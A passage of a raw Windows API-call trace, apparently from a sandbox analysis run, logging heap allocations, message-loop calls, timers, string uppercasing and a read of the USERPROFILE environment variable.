ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0249.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0249.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0249.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0249.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0249.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0249.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0249.957] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0249.957] TranslateMessage (lpMsg=0x8bf970) returned 0 [0249.957] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0249.957] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0249.957] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0249.957] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0249.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0249.958] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0249.958] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0249.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0249.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0249.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0249.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0249.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0249.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0249.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0249.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0249.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0249.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0249.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0249.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0249.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0249.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0249.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0249.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0249.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0249.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0249.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0249.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0249.959] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0249.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0249.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0249.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0249.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0249.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0249.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0249.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa) returned 0x34aa340 [0249.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0249.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0249.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0249.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0249.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0249.961] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0249.961] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0249.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0249.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0249.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0249.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0249.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0249.962] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0249.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0249.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0249.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0249.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0249.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0249.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0249.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0249.962] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0249.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0249.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0249.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0249.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0249.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0249.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0249.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0249.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0249.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0249.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0249.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0249.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0249.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0249.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0249.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0249.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0249.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0249.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0249.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0249.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0249.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0249.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0249.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0249.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0249.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0249.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0249.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0249.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0249.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0249.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0249.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0249.964] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0249.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0249.964] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0249.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0249.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0249.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0249.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0249.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x249c7b0 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0249.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0249.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0249.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0249.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0249.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0249.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0249.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0249.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0249.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0249.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0249.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0249.968] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0249.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0249.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0249.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0249.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0249.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0249.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0249.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0249.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0249.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.968] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0249.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0249.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0249.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0249.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0249.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0249.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0249.968] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0249.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0249.969] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0249.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 